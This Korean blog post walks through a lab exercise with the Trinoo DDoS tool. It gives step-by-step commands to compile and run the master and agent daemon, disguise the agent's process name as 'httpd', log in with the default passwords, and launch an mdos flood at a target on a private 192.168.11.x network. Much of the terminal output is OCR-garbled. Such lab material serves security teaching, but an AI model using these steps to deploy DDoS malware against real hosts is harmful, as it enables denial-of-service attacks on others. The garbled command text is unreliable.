IT꼬꼬마의 지식 물려주기: [Network] S06_02 Trinoo Dos

2020. 7. 14.

[Network] S06_02 Trinoo Dos

*DDOS 공격 - Trinoo

Trinoo

1999년 6월 말부터 7월 사이에 퍼지기 시작했으며, 미네소타 대학 사고의 주범. 원래 이름은 Trin00
처음 솔라리스 2.x 시스템에서 발견되었으며, 최소 227개 시스템이 공격에 쓰인 것으로 알려져 있음
UDP를 기본으로 하는 공격을 시행하며‘statd, cmsd, ttdbserverd’ 데몬이 주 공격 대상
Trinoo는 기본적으로 아래 표와 같은 포트 번호를 사용하지만 소스 코드에서 임의로 변경 가능

TCP
0 P
0 P
0 P
27565
27444
3 | 3 3 5

// 대학에서 버려지듯히...쓰여져서 관리가 안되기 때문에 만들어진것이다.

quit
dos (mdos) IP
mtimer N
logowt
N e (d:300)

*DDOS 공격

*DDOS 공격- Trinoo를 이용한 공격 실습

step 1. Trinoo master 컴파일(192.168.11.47)

Trinoo 소스 압축 풀기 tar -xvf trinoo.tar

압축은 반드시 trinoo 디렉토리에서 해제한다.

[root@attacker tar —xvf tr inoo.tar
password
BENSUOS
daemon/ns . c
master/master . c
master/strf ix . h
master/Makef i le
master/b I owf i sh . c
master/b lowf i sh . h
master/bf_tab . h
[rooteattacker IS
BENSIJOS daemon master password tr i noo. tar
[root@attacker cat password
master server startup: when ask for
gOrave
te Inet to master server: (port 27665) "betaalmostdone"
[root@attacker

master 디렉토리로 이동 make 명령을 이용 컴파일

[root@attacker cd master/
[root@attacker Is
Makef ile bf_tab.h blowf i sh.c blowf ish .h
[root@attacker make
gCC —0 master master . c blowf ish .c —lcrypt
master . c
strfix.h
blowf ish .c: In
blowf ish .c: 131:
blowfish.c: In
blowf ish .c: 192:
blowf ish.c: 194:
blowfish.c: In
blowf ish .c: 232:
blowf ish . c: 234:
strip master
[root@attacker
blowf i sh_in it'
funct i on
warn i ng :
incompat ible irwl icit
encrypt_str ing '
funct i on
incompatible i rwl icit
warn ng :
warn i ng :
incompat ible icit
funct i on
decrypt_str ing '
incompatible i rwl icit
warn ng :
warn i ng :
incompatible icit
Is
declarat ion
declarat ion
declarat ion
declarat ion
declarat ion
of
of
of
of
of
built—in
bui It—ln
bui It—in
bui It—ln
bui It—in
strfix.h
funct i on
funct ion
funct i on
funct ion
funct ion
strncpy'
strlen•
strcpy
strlen•
st rcpy
Makef ile bf_tab.h blowf i sh.c blowf ish .h
master
master . c
[root@attacker

step 2. 에이전트 컴파일과 실행(192.168.11.17)

daemon/ns.c 파일에 마스터 IP를 지정해 준다.

41 •
4?
43
44
45
#define PROCNAME "
char
"192.168.11 .47".
NIL L
httpd" A/

수정된 ns.c 파일은 master 디렉토리로 이동하고 Makefile을 수정한다.

4
5
6
I ackware..
L I —l crypt
master: master .c blowfish.c
•gcc —0 daemon ns.c blowf IBS}
strip daemon

make 명령을 이용 컴파일이후 daemon을 실행한다.

[root@server master]/ . 'daemon
[root@server master]g PS —ax I grep daemon
Warning: bad syntax. perhaps a bogus ? See /usr/share/doc/procps—3.2 .8/FÅO
1207 ?
1319 ?
1368 ?
1439 ?
7 —sess ion
1443 ?
1467 ?
SSI
s
Ssl
O: 00 dbus—daemon
—sys tem
0:00 /usr/sbin/gdm—binary —nodaemon
0:00 /usr/sbin/console—k it—daemon —no—daemon
0:00 /bin/dbus—daemon —fork ——pr int—pid 5 ——pr int—address
0:00 /usr/l
0:00 /usr/l ibexec/gnome—settings—daemon ——gconf—pref ix=/ap
ps/ gdm/s imp I e—greeter/ sett i I ug i ns
1495 ?
1646 pts/O
1648 pts/O
SNI
s
0:00 /usr/l ibexec/rtk i t—daemon
0:00 . 'daemon
0:00 grep daemon
[rooteserver master]g

step 3. 마스터 실행 (192.168.10.47)

master 디렉토리에 master를 실행한다.
암호는 gOrave이다. (O는 대문자다.)

[root@attacker master]t . 'master
?? gOrave
trinoo VI .07d2+f3+c [Aug 6 2018:
TIME (Y)
[root@attacker
PID TTY
1739 pts/O
1786 pts/O
1787 pts/O
[rooteattacker
master]t
00: 00: 00
master]t
ps
bash
mas ter
ps

step 4. 공격을 위해 master에 접속한다.

(192.168.11.47)

telnet 192.168.11.47 27665 로 접속한다.
암호는 'betaalmostdone'이다.
trinoo> 에서 명령을 내릴 수 있다.

[root@attacker telnet 192.168 .11 .47 27665
Trying 192. 168.11 .47..
Connected to 192 .168.11 .47 .
Escape character is •
betaa I mostdone
tr i noo VI .07d2+f3+c.. [rpm8d/cb4Sx/]
tr inoo>

stop 5. 192.168.11.7을 대상으로 공격해보자.

bcast명령은 에이전트 목록을 검색한다.
mdos명령을 이용 대상을 공격하자.

tr inoo> bcast
Listing Bcasts.
192.168.11 .17
End. 1 Bcasts total
tr inoo> help mdos
help mdos: WARNING *BETA*
Packets Targets at same time.
Usage: mdos <target 1: target 2: target 3:>
Lidos 192 .168.11.7
mos: Packeting 192.168.11.7.
tr i noo>

bcast명령에 에이전트가 반응하지 않으면 deamon을 재실행한다.

Master와 Agent를 같은 시스템에서 실행해도 된다. CentOS6 이하를 이용한다.

매우 잠깐동안 매우 많은 수의 패킷이 전달된다..
공격에 참여한 에이전트의 상태도 공격당한 넘이나 별반 다를 것이 없다.

댓글 없음:

댓글 쓰기

피드 구독하기: 댓글 (Atom)